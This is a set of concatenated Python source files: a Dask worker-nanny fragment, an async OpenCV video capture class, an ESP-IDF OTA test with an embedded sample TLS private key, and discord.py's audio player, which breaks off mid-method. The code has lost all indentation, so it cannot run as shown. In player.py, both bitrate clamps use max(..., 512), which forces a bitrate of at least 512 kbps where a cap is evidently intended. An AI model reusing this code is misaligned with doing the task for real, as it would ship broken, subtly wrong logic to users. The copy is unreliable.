if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
@gen.coroutine
def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == 'stopped':
return
if self.status == 'stopping':
yield self.stopped.wait()
return
assert self.status in ('starting', 'running')
self.status = 'stopping'
process = self.process
self.child_stop_q.put({
'op': 'stop',
'timeout': max(0, deadline - loop.time()) * 0.8,
'executor_wait': executor_wait,
})
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
yield gen.sleep(0.05)
if process.is_alive():
logger.warning("Worker process still alive after %d seconds, killing",
timeout)
try:
yield process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
@gen.coroutine
def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
yield gen.sleep(delay)
continue
if msg['uid'] != uid: # ensure that we didn't cross queues
continue
if 'exception' in msg:
logger.error("Failed while trying to start worker process: %s",
msg['exception'])
yield self.process.join()
                raise msg['exception']
else:
raise gen.Return(msg)
@classmethod
def _run(cls, worker_args, worker_kwargs, worker_start_args,
silence_logs, init_result_q, child_stop_q, uid, env, Worker): # pragma: no cover
os.environ.update(env)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(*worker_args, **worker_kwargs)
@gen.coroutine
def do_stop(timeout=5, executor_wait=True):
try:
yield worker._close(report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop('op') == 'stop'
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
@gen.coroutine
def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
yield worker._start(*worker_start_args)
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({'uid': uid, 'exception': e})
init_result_q.close()
else:
assert worker.address
init_result_q.put({'address': worker.address,
'dir': worker.local_dir,
'uid': uid})
init_result_q.close()
yield worker.wait_until_closed()
logger.info("Worker closed")
try:
loop.run_sync(run)
except TimeoutError:
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
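# --- Illustrative sketch (added for clarity; not part of the original module) ---
# Rough outline of standing up a Nanny by hand against an already-running
# scheduler; in practice this wiring is done by the dask-worker CLI. The
# scheduler address and resource numbers below are hypothetical.
def _example_start_nanny():
    loop = IOLoop.current()
    nanny = Nanny(scheduler_ip='127.0.0.1', scheduler_port=8786,
                  ncores=1, memory_limit='1GB', loop=loop)
    nanny.start(0)       # schedules Nanny._start on the IOLoop
    return nanny, loop   # the caller would then run loop.start()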
|
videocaptureasync.py
|
import threading
import cv2
from time import sleep
import copy
class VideoCaptureAsync:
def __init__(self, width=2688, height=1520, thermal=True):
self.src = 0
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
            print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
sleep(0.03)
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def isOpened(self):
return self.cap.isOpened()
def stop(self):
self.started = False
self.thread.join()
def release(self):
self.cap.release()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
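# --- Editor's note: usage sketch appended by the editor, not part of the original file. ---
# It assumes OpenCV (cv2) is importable and a camera is available at index 0; read()
# always returns a copy of the most recent frame grabbed by the background thread.
if __name__ == '__main__':
    cam = VideoCaptureAsync(width=640, height=480).start()
    try:
        for _ in range(100):
            grabbed, frame = cam.read()
            if grabbed:
                cv2.imshow('preview', frame)
            if cv2.waitKey(30) & 0xFF == ord('q'):
                break
    finally:
        cam.stop()
        cam.release()
        cv2.destroyAllWindows()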
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
# parser = argparse.ArgumentParser()
# parser.add_argument('-p', '--port', dest='port', type= int,
# help= "Server Port", default= 8000)
# args = parser.parse_args()
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
    key_file_handle = open(key_file, "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("simple_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
    # the HTTPS server runs in a daemon thread, so it does not need an explicit shutdown here
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import asyncio
import audioop
import io
import json
import logging
import re
import shlex
import subprocess
import sys
import threading
import time
import traceback
from typing import (IO, TYPE_CHECKING, Any, Callable, Generic, Optional, Tuple,
Type, TypeVar, Union)
from .errors import ClientException
from .oggparse import OggStream
from .opus import Encoder as OpusEncoder
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"ERROR: Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'ERROR: expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
            raise TypeError('ERROR: Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
